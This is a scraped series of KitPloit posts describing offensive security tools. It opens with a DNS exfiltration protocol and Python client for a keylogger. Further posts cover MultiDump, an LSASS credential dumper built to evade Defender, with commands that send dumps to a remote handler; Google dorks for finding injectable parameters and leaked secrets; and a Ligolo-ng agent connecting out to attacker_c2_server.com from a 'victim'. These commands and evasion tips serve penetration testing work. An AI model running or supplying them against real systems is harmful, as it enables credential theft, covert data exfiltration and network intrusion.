      id is the id that was established on connection. Data is sent as ASCII encoded in hex.

      code is one of the codes described below.
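
To make the record formats concrete, here is a minimal client sketch (assuming the third-party dnspython package, which is not part of this project) that starts a connection and sends one hex-encoded chunk:

import binascii

import dns.resolver  # third-party: pip install dnspython

resolver = dns.resolver.Resolver()
resolver.nameservers = ["127.0.0.1"]  # the exfiltration server

def connect(sld_tld):
    # a.1.1.1.[sld].[tld] -> server answers 123.123.123.[id]
    answer = resolver.resolve(f"a.1.1.1.{sld_tld}", "A")
    return int(str(answer[0]).split(".")[-1])

def send_chunk(client_id, packet_no, text, sld_tld):
    # b.[packet #].[id].[data].[sld].[tld], data is ASCII encoded as hex
    data = binascii.hexlify(text.encode("ascii")).decode()
    answer = resolver.resolve(f"b.{packet_no}.{client_id}.{data}.{sld_tld}", "A")
    return int(str(answer[0]).split(".")[0])  # answer is [code].123.123.123

cid = connect("example.com")
print(send_chunk(cid, 0, "The quick brown fox.", "example.com"))  # expect 200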

      Response Codes

      200: OK

      If the client sends a request that is processed normally, the server will respond with code 200.

      201: Malformed Record Requests

If the client sends a malformed record request, the server will respond with code 201.

202: Non-Existent Connections

      If the client sends a data packet with an id greater than the # of connections, the server will respond with code 202.

      203: Out of Order Packets

      If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.

204: Max Connections Reached

If the client attempts to create a connection when the maximum has been reached, the server will respond with code 204.

      Dropped Packets

      Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.
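
Following that rule, a resend loop layered over send_chunk from the sketch above might look like this (again assuming dnspython):

import dns.exception

def send_with_retry(client_id, packet_no, text, sld_tld, attempts=3):
    for _ in range(attempts):
        try:
            # the A-record answer doubles as the acknowledgement
            return send_chunk(client_id, packet_no, text, sld_tld)
        except dns.exception.Timeout:
            continue  # no response: resend the same payload
    raise RuntimeError("no acknowledgement from server")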

      Side Notes

      Linux

      Log File

      The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat, you should select the appropriate option to print ASCII control characters, such as -v for cat, or open it in a text-editor.

      Non-Interactive Shells

      The keylogger relies on script, so the keylogger won't run in non-interactive shells.

      Windows

      Repeated Requests

      For some reason, the Windows Dns_Query_A always sends duplicate requests. The server will process it fine because it discards repeated packets.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      MultiDump - Post-Exploitation Tool For Dumping And Extracting LSASS Memory Discreetly

      By: Zion3R β€” March 20th 2024 at 11:30


      MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.

      Blog post: https://xre0us.io/posts/multidump


MultiDump supports LSASS dumps via ProcDump.exe or comsvcs.dll. It offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.

      Usage

[ASCII art banner: MultiDump]

      Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]

-p Path to save procdump.exe, use full path. Defaults to temp directory
-l Path to save encrypted dump file, use full path. Defaults to current directory
-r Set ip:port to connect to a remote handler
--procdump Writes procdump to disk and uses it to dump LSASS
--nodump Disable LSASS dumping
--reg Dump SAM, SECURITY and SYSTEM hives
--delay Increase interval between connections for slower network speeds
-v Enable verbose mode

MultiDump defaults to local mode using comsvcs.dll and saves the encrypted dump in the current directory.
      Examples:
      MultiDump.exe -l C:\Users\Public\lsass.dmp -v
      MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
      usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]

      Handler for RemoteProcDump

      options:
      -h, --help show this help message and exit
      -r REMOTE, --remote REMOTE
      Port to receive remote dump file
      -l LOCAL, --local LOCAL
      Local dump file, key needed to decrypt
      --sam SAM Local SAM save, key needed to decrypt
      --security SECURITY Local SECURITY save, key needed to decrypt
      --system SYSTEM Local SYSTEM save, key needed to decrypt
      -k KEY, --key KEY Key to decrypt local file
      --override-ip OVERRIDE_IP
      Manually specify the IP address for key generation in remote mode, for proxied connection

As with all LSASS-related tools, Administrator/SeDebugPrivilege privileges are required.

The handler depends on Pypykatz to parse the LSASS dump, and on impacket to parse the registry saves. They should be installed in your environment. If you see the error All detection methods failed, the Pypykatz version is likely outdated.

By default, MultiDump uses the comsvcs.dll method and saves the encrypted dump in the current directory.

      MultiDump.exe
      ...
      [i] Local Mode Selected. Writing Encrypted Dump File to Disk...
      [i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
      [i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
      ./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e

If --procdump is used, ProcDump.exe will be written to disk to dump LSASS.

      In remote mode, MultiDump connects to the handler's listener.

      ./ProcDumpHandler.py -r 9001
      [i] Listening on port 9001 for encrypted key...
      MultiDump.exe -r 10.0.0.1:9001

      The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r.

An additional option to dump the SAM, SECURITY and SYSTEM hives is available with --reg; the decryption process is the same as for LSASS dumps. This is more of a convenience feature to make post-exploitation information gathering easier.

      Building MultiDump

      Open in Visual Studio, build in Release mode.

      Customising MultiDump

It is recommended to customise the binary before compiling, for example by changing the static strings or the RC4 key used to encrypt them. To do so, another Visual Studio project, EncryptionHelper, is included. Simply change the key or strings, and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.
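
For reference, RC4 itself is small. Here is a Python sketch that encrypts a string with a key and prints it as a C byte array; this is an illustration only, as EncryptionHelper's exact key and output format are defined by the project:

def rc4(key: bytes, data: bytes) -> bytes:
    # Key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA)
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

# Hypothetical key and plaintext, for illustration only.
enc = rc4(b"example-rc4-key", b"example string")
print("unsigned char enc[] = {" + ", ".join(f"0x{b:02x}" for b in enc) + "};")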

      Self deletion can be toggled by uncommenting the following line in Common.h:

      #define SELF_DELETION

      To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h:

      //#define DEBUG

MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of); the investigation and implementation deserve a blog post of their own: https://xre0us.io/posts/saving-lsass-from-defender/

      Credits



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      GAP-Burp-Extension - Burp Extension To Find Potential Endpoints, Parameters, And Generate A Custom Target Wordlist

      By: Zion3R β€” March 19th 2024 at 11:30

      This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.


      TL;DR

      Installation

1. Visit the Jython Official Site, and download the latest standalone JAR file, e.g. jython-standalone-2.7.3.jar.
      2. Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
      3. On a command line, go to the directory where the jar file is and run java -jar jython-standalone-2.7.3.jar -m ensurepip.
      4. Download the GAP.py and requirements.txt from this project and place in the same directory.
      5. Install Jython modules by running java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.
      6. Go to the Extensions -> Installed and click Add under Burp Extensions.
      7. Select Extension type of Python and select the GAP.py file.

      Using

      1. Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose extension GAP:

      Or you can right click a request or response in any other context and select GAP from the Extensions menu.

2. Then go to the GAP tab to see the results:

      IMPORTANT Notes

      If you don't need one of the modes, then un-check it as results will be quicker.

If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately this can make it a lot slower. It will be more efficient if you run for one or two targets in the Site Map view at a time, as huge projects can consume a lot of resources.

If you want to run GAP on one or more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from the proxy history.

      It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the Ctrl button and click the GAP logo header image to remove it to make more space.

      The Words mode uses the beautifulsoup4 library and this can be quite slow, so be patient!

      In Depth Instructions

      Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.

      NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.

      TODO

      • Get potential parameters from the Request that Burp doesn't identify itself, e.g. XML, graphql, etc.
• Add an option to not add the Tentative Issues, e.g. Parameters that were found in the Response (but not as query parameters in links found).
      • Improve performance of the link finding regular expressions.
      • Include the Request/Response markers in the raised Sus parameter Issues if I can find a way to not make performance really bad!
      • Deal with other size displays and font sizes better to make sure all controls are viewable.
      • If multiple Site Map tree targets are selected, write the files more efficiently. This can take forever in some cases.
      • Use an alternative to beautifulsoup4 that is faster to parse responses for Words.

      Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! β˜• (I could use the caffeine!)

      🀘 /XNL-h4ck3r



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      mapXplore - Allow Exporting The Information Downloaded With Sqlmap To A Relational Database Like Postgres And Sqlite

      By: Zion3R β€” March 17th 2024 at 11:30


mapXplore is a modular application that imports data extracted by sqlmap into a PostgreSQL or SQLite database.

      Its main features are:

      • Import of information extracted from sqlmap to PostgreSQL or SQLite for subsequent querying.
• Sanitized information, meaning that at the time of import, it decodes or transforms unreadable information into readable information.
      • Search for information in all tables, such as passwords, users, and desired information.
      • Automatic export of information stored in base64, such as:

        • Word, Excel, PowerPoint files
        • .zip files
        • Text files or plain text information
        • Images
      • Filter tables and columns by criteria.

      • Filter by different types of hash functions without requiring prior conversion.
      • Export relevant information to Excel or HTML

      Installation

      Requirements

      • python-3.11
      git clone https://github.com/daniel2005d/mapXplore
      cd mapXplore
pip install -r requirements.txt

      Usage

      It is a modular application, and consists of the following:

      • config: It is responsible for configuration, such as the database engine to use, import paths, among others.
      • import: It is responsible for importing and processing the information extracted from sqlmap.
      • query: It is the main module capable of filtering and extracting the required information.
        • Filter by tables
        • Filter by columns
        • Filter by one or more words
• Filter by one or more hash functions, among which are (see the sketch after this list):
          • MD5
          • SHA1
          • SHA256
          • SHA3
          • ....
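
For illustration only, here is a minimal Python sketch (not mapXplore's actual code; the patterns are assumptions) of how values can be matched against common hash formats by length and charset, which is what filtering "without requiring prior conversion" amounts to:

import re

HASH_PATTERNS = {
    "MD5": re.compile(r"^[a-fA-F0-9]{32}$"),
    "SHA1": re.compile(r"^[a-fA-F0-9]{40}$"),
    "SHA256": re.compile(r"^[a-fA-F0-9]{64}$"),
    # SHA3 variants would need their own lengths.
}

def classify_hash(value):
    # Return the first hash format whose pattern matches, else None.
    for name, pattern in HASH_PATTERNS.items():
        if pattern.match(value):
            return name
    return None

# Example: scan a column of dumped values for hash-like entries.
for value in ["admin", "5f4dcc3b5aa765d61d8327deb882cf99"]:
    kind = classify_hash(value)
    if kind:
        print(f"{value} looks like {kind}")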

      Beginning

      Allows loading a default configuration at the start of the program

      python engine.py [--config config.json]

      Modules



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Google-Dorks-Bug-Bounty - A List Of Google Dorks For Bug Bounty, Web Application Security, And Pentesting

      By: Zion3R β€” March 14th 2024 at 11:30


      A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting

      Live Tool


      Broad domain search w/ negative search

      site:example.com -www -shop -share -ir -mfa

      PHP extension w/ parameters

      site:example.com ext:php inurl:?

      Disclosed XSS and Open Redirects

      site:openbugbounty.org inurl:reports intext:"example.com"

      Juicy Extensions

      site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess

      XSS prone parameters

      inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example.com

      Open Redirect prone parameters

      inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example.com

      SQLi Prone Parameters

      inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example.com

      SSRF Prone Parameters

      inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example.com

      LFI Prone Parameters

      inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example.com

      RCE Prone Parameters

      inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example.com

      High % inurl keywords

      inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php site:example[.]com

      Sensitive Parameters

      inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:example[.]com

      API Docs

      inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:"example[.]com"

      Code Leaks

      site:pastebin.com "example.com"

      site:jsfiddle.net "example.com"

      site:codebeautify.org "example.com"

      site:codepen.io "example.com"

      Cloud Storage

      site:s3.amazonaws.com "example.com"

      site:blob.core.windows.net "example.com"

      site:googleapis.com "example.com"

      site:drive.google.com "example.com"

      site:dev.azure.com "example[.]com"

      site:onedrive.live.com "example[.]com"

      site:digitaloceanspaces.com "example[.]com"

      site:sharepoint.com "example[.]com"

      site:s3-external-1.amazonaws.com "example[.]com"

      site:s3.dualstack.us-east-1.amazonaws.com "example[.]com"

      site:dropbox.com/s "example[.]com"

      site:box.com/s "example[.]com"

      site:docs.google.com inurl:"/d/" "example[.]com"

      JFrog Artifactory

      site:jfrog.io "example[.]com"

      Firebase

      site:firebaseio.com "example[.]com"

      File upload endpoints

      site:example.com "choose file"

      Dorks that work better w/o domain

      Bug Bounty programs and Vulnerability Disclosure Programs

      "submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"

      site:*/security.txt "bounty"

      Apache Server Status Exposed

      site:*/server-status apache

      WordPress

      inurl:/wp-admin/admin-ajax.php

      Drupal

      intext:"Powered by" & intext:Drupal & inurl:user

      Joomla

      site:*/joomla/login


      Medium articles for more dorks:

      https://thegrayarea.tech/5-google-dorks-every-hacker-needs-to-know-fed21022a906

      https://infosecwriteups.com/uncover-hidden-gems-in-the-cloud-with-google-dorks-8621e56a329d

      https://infosecwriteups.com/10-google-dorks-for-sensitive-data-9454b09edc12

      Top Parameters:

      https://github.com/lutfumertceylan/top25-parameter

      Proviesec dorks:

      https://github.com/Proviesec/google-dorks
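
Dorks like the ones above are easy to template per target. Below is a minimal sketch (a hypothetical helper, not part of any tool listed here) that substitutes a domain into a few of the patterns:

TEMPLATES = [
    "site:{d} ext:php inurl:?",
    "site:{d} ext:log | ext:txt | ext:conf | ext:env | ext:bak",
    "inurl:q= | inurl:search= | inurl:lang= inurl:& site:{d}",
    'site:s3.amazonaws.com "{d}"',
]

def build_dorks(domain):
    # Fill the {d} placeholder in each template with the target domain.
    return [t.format(d=domain) for t in TEMPLATES]

for dork in build_dorks("example.com"):
    print(dork)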



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Gtfocli - GTFO Command Line Interface For Easy Binaries Search Commands That Can Be Used To Bypass Local Security Restrictions In Misconfigured Systems

      By: Zion3R β€” March 12th 2024 at 23:38


GTFOcli is a Command Line Interface for easily searching binaries and commands that can be used to bypass local security restrictions in misconfigured systems.


      Installation

      Using go:

      go install github.com/cmd-tools/gtfocli@latest

      Using homebrew:

      brew tap cmd-tools/homebrew-tap
      brew install gtfocli

      Using docker:

      docker pull cmdtoolsowner/gtfocli

      Usage

      Search for unix binaries

      Search for binary tar:

      gtfocli search tar

      Search for binary tar from stdin:

      echo "tar" | gtfocli search

Search for binaries listed in a file:

      cat myBinaryList.txt
      /bin/bash
      /bin/sh
      tar
      arp
      /bin/tail

      gtfocli search -f myBinaryList.txt

      Search for windows binaries

      Search for binary Winget.exe:

      gtfocli search Winget --os windows

      Search for binary Winget from stdin:

      echo "Winget" | gtfocli search --os windows

Search for binaries listed in a file:

      cat windowsExecutableList.txt
      Winget
      c:\\Users\\Desktop\\Ssh
      Stordiag
      Bash
      c:\\Users\\Runonce.exe
      Cmdkey
      c:\dir\subDir\Users\Certreq.exe

      gtfocli search -f windowsExecutableList.txt --os windows

      Search for binary Winget and print output in yaml format (see -h for available formats):

      gtfocli search Winget -o yaml --os windows

      Search using dockerized solution

      Examples:

      Search for binary Winget and print output in yaml format:

      docker run -i cmdtoolsowner/gtfocli search Winget -o yaml --os windows

      Search for binary tar and print output in json format:

      echo 'tar' | docker run -i cmdtoolsowner/gtfocli search -o json

Search for binaries listed in a file mounted as a volume in the container:

      cat myBinaryList.txt
      /bin/bash
      /bin/sh
      tar
      arp
      /bin/tail

      docker run -i -v $(pwd):/tmp cmdtoolsowner/gtfocli search -f /tmp/myBinaryList.txt

      CTF

A common use case for gtfocli is to combine it with find:

      find / -type f \( -perm 04000 -o -perm -u=s \) -exec gtfocli search {} \; 2>/dev/null

      or

      find / -type f \( -perm 04000 -o -perm -u=s \) 2>/dev/null | gtfocli search

      Credits

      Thanks to GTFOBins and LOLBAS, without these projects gtfocli would never have come to light.

      Contributing

      You want to contribute to this project? Wow, thanks! So please just fork it and send a pull request.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Kali Linux 2024.1 - Penetration Testing and Ethical Hacking Linux Distribution

      By: Zion3R β€” March 3rd 2024 at 01:01

      Time for another Kali Linux release! – Kali Linux 2024.1. This release has various impressive updates.


      The summary of the changelog since the 2023.4 release from December is:

      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      SwaggerSpy - Automated OSINT On SwaggerHub

      By: Zion3R β€” February 19th 2024 at 11:30


      SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.


      What is Swagger?

      Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.


      About SwaggerHub

      SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.


      Why OSINT on SwaggerHub?

      Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:

      1. Developer Oversights: Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.

      2. Security Best Practices: OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.

      3. Preventing Data Leaks: By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.

      4. Risk Mitigation: Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.

      5. Compliance and Privacy: Many industries have stringent compliance requirements regarding the protection of sensitive data. OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.

      6. Educational Opportunities: Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.

      By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.


      How SwaggerSpy Works

      SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.
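
As a rough model of that approach, the sketch below (not SwaggerSpy's actual code; the patterns and the spec URL are illustrative assumptions) pulls an API document and greps it for secret-looking strings:

import re
import urllib.request

# Illustrative patterns only; real secret detection needs far more rules.
SECRET_PATTERNS = {
    "AWS access key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "Bearer token": re.compile(r"Bearer\s+[A-Za-z0-9\-_.=]{20,}"),
    "Password assignment": re.compile(r'(?i)"password"\s*:\s*"[^"]+"'),
}

def scan_spec(url):
    # Download an API spec and return (pattern name, match) pairs.
    raw = urllib.request.urlopen(url).read().decode("utf-8", "replace")
    return [(name, m) for name, rx in SECRET_PATTERNS.items() for m in rx.findall(raw)]

# Hypothetical spec URL, for illustration only:
# print(scan_spec("https://api.swaggerhub.com/apis/some-owner/some-api/1.0"))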


      Getting Started

      To use SwaggerSpy, follow these steps:

      1. Installation: Clone the SwaggerSpy repository and install the required dependencies.
      git clone https://github.com/UndeadSec/SwaggerSpy.git
      cd SwaggerSpy
      pip install -r requirements.txt
2. Usage: Run SwaggerSpy with the target search terms (more accurate with domains).
      python swaggerspy.py searchterm
3. Results: SwaggerSpy will generate a report containing OSINT findings, including information about the API, endpoints, and secrets.

      Disclaimer

      SwaggerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.


      Contribution

      Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.


      About the Author

      SwaggerSpy is developed and maintained by Alisson Moretto (UndeadSec)

      I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.


      TODO

      Regular Expressions Enhancement
      • [ ] Review and improve existing regular expressions.
      • [ ] Ensure that regular expressions adhere to best practices.
      • [ ] Check for any potential optimizations in the regex patterns.
      • [ ] Test regular expressions with various input scenarios for accuracy.
      • [ ] Document any complex or non-trivial regex patterns for better understanding.
      • [ ] Explore opportunities to modularize or break down complex patterns.
      • [ ] Verify the regular expressions against the latest specifications or requirements.
      • [ ] Update documentation to reflect any changes made to the regular expressions.

      License

      SwaggerSpy is licensed under the MIT License. See the LICENSE file for details.


      Thanks

      Special thanks to @Liodeus for providing project inspiration through swaggerHole.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Navgix - A Multi-Threaded Golang Tool That Will Check For Nginx Alias Traversal Vulnerabilities

      By: Zion3R β€” February 5th 2024 at 11:30


      navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities


      Techniques

Currently, navgix supports two techniques for finding vulnerable directories (or location aliases):

      Heuristics

navgix makes an initial GET request to the page, and if any directories are referenced in the page HTML (in src attributes on HTML components), it tests each folder in the path for the vulnerability. For example, if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.
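
A minimal sketch of that prefix derivation (illustrative Python, not navgix's Go code; the off-by-slash payload shown in the comments is the classic nginx alias-traversal check):

from urllib.parse import urlparse

def candidate_prefixes(asset_url):
    # '/static/img/photos/avatar.png' -> ['/static/', '/static/img/', '/static/img/photos/']
    path = urlparse(asset_url).path
    parts = [p for p in path.split("/") if p][:-1]  # drop the filename
    prefixes, current = [], ""
    for part in parts:
        current += "/" + part
        prefixes.append(current + "/")
    return prefixes

for prefix in candidate_prefixes("https://host/static/img/photos/avatar.png"):
    # An alias traversal check would request e.g. '/static../' (off-by-slash)
    # and look for files that should live outside the aliased directory.
    print(prefix, "->", prefix.rstrip("/") + "../")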

      Brute-force

navgix will also test a short list of directories that commonly have this vulnerability; if any of them exist, it will attempt to confirm whether the vulnerability is present.

      Installation

      git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
      go build

      Acknowledgements



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Nemesis - An Offensive Data Enrichment Pipeline

      By: Zion3R β€” February 3rd 2024 at 11:30


      Nemesis is an offensive data enrichment pipeline and operator support system.

      Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.

      Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operators’ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.


      Setup / Installation

      See the setup instructions.

      Contributing / Development Environment Setup

      See development.md

      Further Reading

• Hacking With Your Nemesis (Aug 9, 2023): https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4
• Challenges In Post-Exploitation Workflows (Aug 2, 2023): https://posts.specterops.io/challenges-in-post-exploitation-workflows-2b3469810fe9
• On (Structured) Data (Jul 26, 2023): https://posts.specterops.io/on-structured-data-707b7d9876c6

      Acknowledgments

Nemesis is built on a large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we've forgotten proper credit anywhere, please let us know or submit a pull request!

      We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

      By: Zion3R β€” January 26th 2024 at 11:30


      Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


      Features

      • Tun interface (No more SOCKS!)
      • Simple UI with agent selection and network information
      • Easy to use and setup
      • Automatic certificate configuration with Let's Encrypt
      • Performant (Multiplexing)
      • Does not require high privileges
      • Socket listening/binding on the agent
      • Multiple platforms supported for the agent

      How is this different from Ligolo/Chisel/Meterpreter... ?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using gVisor.

When running the relay/proxy server, a tun interface is used; packets sent to this interface are translated and then transmitted to the agent's remote network.

      As an example, for a TCP connection:

• A SYN is translated to a connect() on the remote host
• A SYN-ACK is sent back if connect() succeeds
• A RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED is returned after connect()
• Nothing is sent on timeout

      This allows running tools like nmap without the use of proxychains (simpler and faster).
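
Conceptually, the agent-side translation behaves like the following sketch (a Python model of the behaviour described above, not Ligolo-ng's actual Go implementation):

import errno
import socket

def handle_syn(dst_ip, dst_port):
    # A SYN seen on the tun interface becomes a plain connect() on the agent.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(3)
    try:
        s.connect((dst_ip, dst_port))
        return "SYN-ACK"  # connect() succeeded
    except socket.timeout:
        return ""         # nothing is sent on timeout
    except OSError as e:
        if e.errno in (errno.ECONNRESET, errno.ECONNABORTED, errno.ECONNREFUSED):
            return "RST"  # refused/reset -> RST goes back to the scanner
        return ""
    finally:
        s.close()

print(handle_syn("127.0.0.1", 22))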

      Building & Usage

      Precompiled binaries

      Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

      Building Ligolo-ng

      Building ligolo-ng (Go >= 1.20 is required):

      $ go build -o agent cmd/agent/main.go
      $ go build -o proxy cmd/proxy/main.go
      # Build for Windows
      $ GOOS=windows go build -o agent.exe cmd/agent/main.go
      $ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

      Setup Ligolo-ng

      Linux

      When using Linux, you need to create a tun interface on the Proxy Server (C2):

      $ sudo ip tuntap add user [your_username] mode tun ligolo
      $ sudo ip link set ligolo up

      Windows

      You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

      Running Ligolo-ng proxy server

      Start the proxy server on your Command and Control (C2) server (default port 11601):

      $ ./proxy -h # Help options
      $ ./proxy -autocert # Automatically request LetsEncrypt certificates

      TLS Options

      Using Let's Encrypt Autocert

      When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

      Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

      Using your own TLS certificates

      If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

      Automatic self-signed certificates (NOT RECOMMENDED)

      The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

      The -ignore-cert option needs to be used with the agent.

      Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

      Using Ligolo-ng

      Start the agent on your target (victim) computer (no privileges are required!):

      $ ./agent -connect attacker_c2_server.com:11601

      If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

      A session should appear on the proxy server.

      INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

      Use the session command to select the agent.

      ligolo-ng Β» session 
      ? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

      Display the network configuration of the agent using the ifconfig command:

      [Agent : nchatelain@nworkstation] Β» ifconfig 
      [...]
